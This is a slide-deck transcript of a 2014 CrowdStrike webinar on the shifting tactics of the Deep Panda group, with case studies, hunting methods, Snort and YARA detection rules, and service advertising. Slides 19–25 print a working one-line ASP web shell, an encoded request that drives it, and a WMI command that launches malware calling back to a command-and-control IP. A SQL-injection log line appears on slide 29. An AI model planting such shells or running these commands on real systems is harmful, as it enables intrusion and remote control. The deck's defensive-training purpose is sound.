Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

CrowdCasts Monthly: Going Beyond the Indicator

2,979 views

Published on

Learn more about CrowdStrike Services. Request a free consultation on Proactive Response and Incident Response offerings: response.crowdstrike.com/services/

Published in: Technology, Business
  • Be the first to comment

CrowdCasts Monthly: Going Beyond the Indicator

  1. 1. Going Beyond the Indicator
  2. 2. Agenda • Introductions • Typical Attacker TTPs • Case Studies • New Tactics Explained • Hunting and Detecting • Best Practice Preparations • Resources / Q & A © 2014 CrowdStrike, Inc. All rights reserved. 2 @CROWDSTRIKE | #CROWDCASTS
  3. 3. Today’s Speakers Stroz Friedberg, AT&T, The Aerospace Corporation, CERT/CC Incident Response, Forensic Analysis, and Risk Assessments DANNY LUNGSTROM © 2014 CrowdStrike, Inc. All rights reserved. 3 PRIOR TO CROWDSTRIKE 8+ YEARS @CROWDSTRIKE | #CROWDCASTS LinkedIn: Danny Lungstrom CONNECT
  4. 4. Today’s Speakers KPMG LLP. (Information Protection and Business Resiliency) Performing Security Assessments, Auditing and Remediating Environments, and Developing Security Programs/Strategies JUSTIN J. WEISSERT © 2014 CrowdStrike, Inc. All rights reserved. 4 PRIOR TO CROWDSTRIKE CONNECT 7+ YEARS @CROWDSTRIKE | #CROWDCASTS LinkedIn: Justin Weissert Twitter: @JJWeissert
  5. 5. Today’s Speakers RSA NetWitness, Mandiant, Beckman Coulter LinkedIn: Ryan Jafarkhani Twitter: @rj_jafar Auditing, Conducting Incident Response Investigations, Network Forensics, Computer Forensics and Malware Analysis © 2014 CrowdStrike, Inc. All rights reserved. 5 PRIOR TO CROWDSTRIKE CONNECT 5+ YEARS @CROWDSTRIKE | #CROWDCASTS RYAN JAFARKHANI
  6. 6. 6 WHO IS ? CrowdStrike is a global provider of security technologies and services focused on identifying advanced threats and targeted attacks. Using big-data technologies, CrowdStrike’s next-generation threat protection platform enables enterprises to identify unknown malware, detect zero-day threats, pinpoint advanced adversaries, and provide attribution. © 2014 CrowdStrike, Inc. All rights reserved.
  7. 7. 7 WHAT DO WE DO? TECHNOLOGY ENDPOINT THREAT DETECTION & RESPONSE CONTINUOUS ENDPOINT ACTIVITY MONITORING & REAL-TIME FORENSICS SERVICES PROACTIVE & INCIDENT RESPONSE SERVICES INTELLIGENCE CYBER THREAT INTELLIGENCE & ATTRIBUTION © 2014 CrowdStrike, Inc. All rights reserved.
  8. 8. About CrowdStrike Services Incident Response Investigations Proactive Threat Assessments IR Program Development Average of Ten Years IR Industry Experience Backgrounds in IR Consulting, Government, and Defense Specialists in Broad Range of Technologies Finance, Technology, Manufacturing, Retail, Healthcare, Telecommunications, Oil & Gas, Entertainment © 2014 CrowdStrike, Inc. All rights reserved. 8 COMPREHENSIVE OFFERINGS INDUSTRY VETERANS VARIETY OF CUSTOMER VERTICALS @CROWDSTRIKE | #CROWDCASTS WHO ADVERSARY WHY INTENT WHAT MALWARE INDUSTRY
  9. 9. And there are a lot of adversaries © 2014 CrowdStrike, Inc. All rights reserved. 9 Adversary groups our Intelligence team tracks… Commercial, Government, Non-profit Financial, Technology, Communications Defense & Aerospace, Industrial Engineering, NGOs Financial Sector Dissident groups Electronics & Communications G20, NGOs, Dissident Groups CHINA IRAN Energy Companies INDIA Government, Legal, Financial, Media, Telecom RUSSIA Oil and Gas Companies Financial Sector Crime Syndicates @CROWDSTRIKE | #CROWDCASTS
  10. 10. 10 TYPICAL ATTACKER TTPS 2014 Crowdstrike, Inc. All rights reserved.
  11. 11. Typical - Attacker TTPs • Initial Attack Vector • Malware – Persistence Mechanism – Command & Control – Functionality • Lateral Movement • Data Extraction/Theft 2014 CrowdStrike, Inc. All rights reserved. 11
  12. 12. Shift in Attacker TTPs 2014 CrowdStrike, Inc. All rights reserved. 12 Attacker TTP Historical Trends Current Trends Initial Attack Vector Spearphish and Vulnerable External Facing Applications (Most Common) No Significant Change Malware – Persistence Mechanism Installed as Service, Run Key, Etc. No Persistence Malware – Command & Control Beacon to Malicious IP or Domain No Standard Beacon Activity Malware – Functionality Simple – Provides Shell or Basic Upload/Download Functionality Robust – Includes All Required Functionality and Commands Malware – Location Written to Disk Memory-Resident
  13. 13. Shift in Attacker TTPs (Cont.) 2014 CrowdStrike, Inc. All rights reserved. 13 Attacker TTP Historical Trends Current Trends Lateral Movement Net Use, RDP or Utilities (e.g. PSExec) WMI, Service Accounts Obfuscation Timestomp Standard Times (Windows API) Timestomp Both Standard and File Times (Windows API and MFT) Data Extraction Compress Data and Send to Compromised Host Provider No Significant Change Last Hop Communication Source Country IPs (Most Often Chinese, Russian, Iranian) North American IPs, Anonymous VPN Solutions, Cloud
  14. 14. Catalyst for Change 2014 CrowdStrike, Inc. All rights reserved. 14 • Shifts in Tactics – Increased Intel Sharing •  Whitepapers •  Blog Posts •  Conference Demos •  VirusTotal •  US Government JIB (Joint Indicator Bulletin) Pros Cons •  Increased awareness / detection for public companies •  Decreased Intel gap for smaller organizations •  Increased costs for attackers to change TTPs •  Indicators become less effective as attackers shift TTPs (e.g. new malware, C2 infrastructure) •  Attacks become more advanced to avoid current methods of detection •  Reduces visibility into what attacker is doing and/ or targeting
  15. 15. 15 CASE STUDIES 2014 Crowdstrike, Inc. All rights reserved.
  16. 16. Case Studies - Background • Company #1 – Company compromised in 2012 using historical TTPs – Partial Remediation February 2013 – Re-Compromise March 2013 with new TTPs • Company #2 – Compromised March 2013 – New TTPs from Company 1 re-compromise were observed © 2014 CrowdStrike, Inc. All rights reserved. 16
  17. 17. Timeline © 2014 CrowdStrike, Inc. All rights reserved. 17 @CROWDSTRIKE | #CROWDCASTS February 2013 March 2013 April 2013 Company #1 Investigation Commences Traditional Tactics Intel Community Shares TTPs Shared Widely Company #1 Partial Remediation Logging & Monitoring Old Tactics Company #2 Investigation Commences New Tactics Company #1 Re-compromised New Tactics
  18. 18. 18 NEW TACTICS EXPLAINED 2014 Crowdstrike, Inc. All rights reserved.
  19. 19. Deep Panda – Simple Web Shell • 28 byte web shell •  Active Server Page file –  Expected input is VBScript code (encoded as ASCII hex) •  The execute() function executes any VBScript passed to it –  Upload / download files –  Execute arbitrary commands (including WMI) –  Full access to file system •  Controlled by an attacker “thick client” 2014 Crowdstrike, Inc. All rights reserved. 19 <%execute request(chr(42))%>
  20. 20. Deep Panda – Simple Web Shell 2014 Crowdstrike, Inc. All rights reserved. 20 As a simple example of an encoded command, the following GET request would cause the backdoor to execute the code Response.Write(“<h1>Hello World</h1>”) and would render “Hello World” to be printed in the web browser:  http://<webserver>/showimage.asp?*=%52%65%73%70%6F%6E%73%65%2E%57%72%6 9%74%65%28%22%3C%68%31%3E%48%65%6C%6C%6F%20%57%6F%72%6C%64%3C%2F%68%31 %3E%22%29
  21. 21. Deep Panda – Complex Web Shell © 2014 CrowdStrike, Inc. All rights reserved. 21 •  Ability to impersonate a user (with valid credentials) •  Eight different commands –  File system, SQL server, and Active Directory requests –  Upload / download files –  Compile and execute any C# code
  22. 22. Web Shell Authentication • Rudimentary (but effective) authentication for incoming connections – Requires the presence of a cookie named ‘zWiz’ – or HTTP header Keep-Alive = 320 – or language header containing es- DN (invalid language) • Prevents identification via search engine indexing or vulnerability scanning 2014 Crowdstrike, Inc. All rights reserved. 22
  23. 23. Web Shells – But Why? •  Primary foothold back into victim organization •  Less reliant on malware installed on systems, beaconing to a C2 © 2014 CrowdStrike, Inc. All rights reserved. 23 • Why? –  Low to virtually no detection by antivirus products –  The absence of command and control beacon traffic –  Impossible to block known malicious IP addresses to a web server since adversary can easily change their source IP address –  Cookie and HTTP header authentication aware web shells avoid being enumerated by search engines and restrict access, further reducing their network footprint
  24. 24. Second Stage Malware © 2014 CrowdStrike, Inc. All rights reserved. 24 C2 Infrastructure - Execution using Web Shell -  Lateral Movement -  Data theft Upload MalwareAccess Web Shell Adversary Web ServerAnonymous VPN or Proxy Why? No Command and Control Beacon activity Change IP/Domain on the fly Runs in memory Limits forensic artifacts
  25. 25. Lateral Movement © 2014 CrowdStrike, Inc. All rights reserved. 25 Web Server System32cmd.exe - c:bad.exe /f wmi /s Host2 /u Host2Administrator /p ”P@ssW0rd" /m call /q "Win32_Process" /c Create – CommandLine:C:bad.exe /f sh /s 59.111.22.222 /p 443" Host 2 C2 Infrastructure 59.111.22.222 Anonymous VPN or Proxy Adversary Access Web Shell Leverage WMI Custom VB script “PsExec” Utility 4kb script to remotely launch process as a specified user Cscript.exe – Username Password Remote Host Process path Why WMI? Evades most typical logging Shows up as WMI Service Powerful functionality, built into Windows
  26. 26. 26 HUNTING AND DETECTING 2014 Crowdstrike, Inc. All rights reserved.
  27. 27. Go Beyond the Indicator • New evil requires new approaches for detection • Look through multiple haystacks for a single needle – The evil stands out with the right methodology • Blog series – Mo’ Shells Mo’ Problems © 2014 CrowdStrike, Inc. All rights reserved. 27 http://www.crowdstrike.com/blog/
  28. 28. Hunting – WMI Activity © 2014 CrowdStrike, Inc. All rights reserved. 28 • Windows XP and Server 2003 Had Limited Logging – %systemroot%system32wbemlogs • Windows 7 and Server 2008 Do NOT Log – Help investigators help you – enable ahead of time! •  Wevtutil.exe  sl  Microsoft-­‐Windows-­‐WMI-­‐Activity/Trace  /e:true   – Review WMITracing.log via Event Viewer • Be Familiar with Your Environment’s Use of WMI
  29. 29. Hunting Web Shells – Identifying Intrusion Points • Web shells are often one of the earliest stages of malware • Search for activity on the system near the first known compromise time – Successful web scans in logs – SQL injection – Dropper malware – Lateral movement from other compromised systems – Pages created or modified within the webserver document root 2014 Crowdstrike, Inc. All rights reserved. 29 2013-08-25 13:03:53 GET item-details.aspx id=1%27%20or%201=@@version-- - 80 - <redacted IP>
  30. 30. Hunting Web Shells – File Stacking • File stacking is based on the concept of least frequency of occurrence • Collect files from all of your webservers and investigate outliers – What files do not exist on other web servers? – PHP|JSP|ASP|ASPX|CFM © 2014 CrowdStrike, Inc. All rights reserved. 30
  31. 31. Hunting Web Shells – Web Log Review • Perform statistical analysis of page requests and search for outliers – See exactly when the web shells were in use via the web logs 2014 Crowdstrike, Inc. All rights reserved. 31
  32. 32. Hunting Web Shells – Network Monitoring • Stack Web Requests from Network Data • Leverage Cyber Intelligence Feeds to Detect Known Web Shells – Unique header attributes – HTML used to produce the shell © 2014 CrowdStrike, Inc. All rights reserved. 32 alert  tcp  $EXTERNAL_NET  any  -­‐>  $WEB_SERVERS   $HTTP_PORTS  (msg:  "CrowdStrike  Deep  Panda   CSharp  Webshell  Headers";  content:  "Keep-­‐ Alive:  320";  http_raw_header;  content:  "es-­‐ DN";  http_raw_header;  flow:  established,   to_server;  classtype:  trojan-­‐activity;   metadata:  service  http;  sid:  xxx;  rev:  xxx;  )  
  33. 33. Hunting – Memory Resident Malware © 2014 CrowdStrike, Inc. All rights reserved. 33 • “Fileless” Forensics Fun • Persistence, We Don’t Need No Stinkin’ Persistence • New Approach to Malware Means New Approach to Forensics • Hidden, Not Invisible • What’s Normal and What’s New? – Get to know your systems – Image memory, review, rinse and repeat
  34. 34. Hunting with YARA • YARA signatures can be used to search your enterprise for specific patterns on disk and in memory 2014 Crowdstrike, Inc. All rights reserved. 34 rule CrowdStrike_13091_01 : deep_panda alice RAT { meta: description = "Detection of Mad Hatter .NET RAT" last_modified = "2013-10-08" version = "1.1" in_the_wild = true copyright = "CrowdStrike, Inc" report = "CSIT-13091" strings: $marker1 = "alice'srabbithole" wide $marker2 = "{{"Version":{0},"HostName":"{1}","osVersion": "{2}","tm": "{3}","tz":{4}}}" wide $marker3 = "InstManager.pdb" $marker4 = "<osVersion>" $marker5 = "<tm>" $marker6 = "<tz>" condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 2 of ($marker*) }
  35. 35. CrowdResponse • Free CrowdStrike Community Tool • Collect and Analyze Artifacts Across Your Enterprise • Available Modules – DirList – YARA – PSList • Many Modules Coming Soon © 2014 CrowdStrike, Inc. All rights reserved. 35 http://www.crowdstrike.com/community-tools/
  36. 36. 36 BEST PRACTICE PREPARATIONS 2014 Crowdstrike, Inc. All rights reserved.
  37. 37. Best Practices • Proactive Defense of Your Network – Isolate Critical Assets with Network Segmentation – Consolidate and Monitor Internet Egress Points – Implement Centralized Logging – Patch, Patch, and Patch Again – Secure Web Applications and Internal Software Projects – Minimize or Remove Local Admin Privileges – Implement a Tiered Active Directory Admin Model – Incorporate Cyber Intelligence Feeds 2014 Crowdstrike, Inc. All rights reserved. 37
  38. 38. CrowdStrike Can Help! • Services to Consider – Tabletop Assessments (Yearly at Least) •  Keep your team primed and educated on latest attack vectors – Next-Gen Penetration Testing •  More than just a cursory glance, take a real-world scenario approach – Incident Response, Disaster Recovery and Business Continuity Plans •  CrowdStrike knowledge and experience can help you improve/build plans – Incident Response Services Retainer •  Avoid paperwork related time delays • CrowdStrike Intelligence Subscription – Stay Up To Date with Latest Attacker TTPs 2014 CrowdStrike, Inc. All rights reserved. 38
  39. 39. 39 CROWDSTRIKE RESOURCES 2014 Crowdstrike, Inc. All rights reserved.
  40. 40. CrowdStrike Global Threat Report • Adversary activity analysis and predictions • Look back at 2013 • Predictive trends for 2014 • Threat actor profiles and TTPs • Get it on crowdstrike.com © 2014 CrowdStrike, Inc. All rights reserved. 40
  41. 41. INCIDENT RESPONSE SERVICES PROACTIVE RESPONSE SERVICES CROWDSTRIKE SERVICES PROACTIVE RESPONSE SERVICES INCIDENT RESPONSE SERVICES CrowdStrike Services INTELLIGENCETECHNOLOGY 2014 Crowdstrike, Inc. All rights reserved. 41
  42. 42. 2014 Crowdstrike, Inc. All rights reserved. 42 PROACTIVE RESPONSE SERVICES PROACTIVE RESPONSE SERVICES Counter Threat Assessment IR Program Development Next-Gen Pen Testing Tabletop Assessment InfoSec Capability Maturing Model Adversary Assessments INCIDENT RESPONSE SERVICES Computer Forensic Analysis Litigation Support Expert Witness Testimony Remediation Malware Analysis
  43. 43. Government-quality intelligence developed using an ‘all-source model’ Detailed technical and strategic analysis of 50+ adversaries’ capabilities, indicators and tradecraft, attribution and intentions Customizable feeds and API for indicators of compromise Indicators can be integrated into current firewall, IDS/IPS, or SIEM solutions to provide real-time attribution Tailored Intelligence feature provides visibility into breaking events that matter an organization’s brand, infrastructure, and customers Falcon Intelligence: Threat Intelligence Subscription 2 3 4 1 5 2014 Crowdstrike, Inc. All rights reserved. 43
  44. 44. Falcon Host: Endpoint Threat Detection & Response Identifies unknown malware & detects zero-day threats Captures and correlates system events to identify adversary activity in real-time Maximum visibility across the full kill chain allows for insight into past & current attacks Context-based detection does not rely on signatures or easily changed IOCs Intelligence integration provides full attribution to identify context, motivation, and actor behind an attack 2 3 4 1 5 2014 Crowdstrike, Inc. All rights reserved. 44
  45. 45. Falcon Host: Continuous Endpoint Activity Monitoring Explore rich execution data collected by the Falcon Host sensors Dashboards provide an at-a-glance view of recent activity for investigative purposes Expert-designed menu of queries provide the ability to proactively hunt for malicious activity 2 3 1 2014 Crowdstrike, Inc. All rights reserved. 45
  46. 46. © 2014 CrowdStrike, Inc. All rights reserved. 46 Q & A
  47. 47. NEXT © 2014 CrowdStrike, Inc. All rights reserved. 47 @CROWDSTRIKE | #CROWDCASTS Topic: Operationalizing Intelligence Adam Meyers – Director, Intelligence Elia Zaitsev – Senior Sales Engineer April 29th | 2PM ET/11AM PT Q&A

×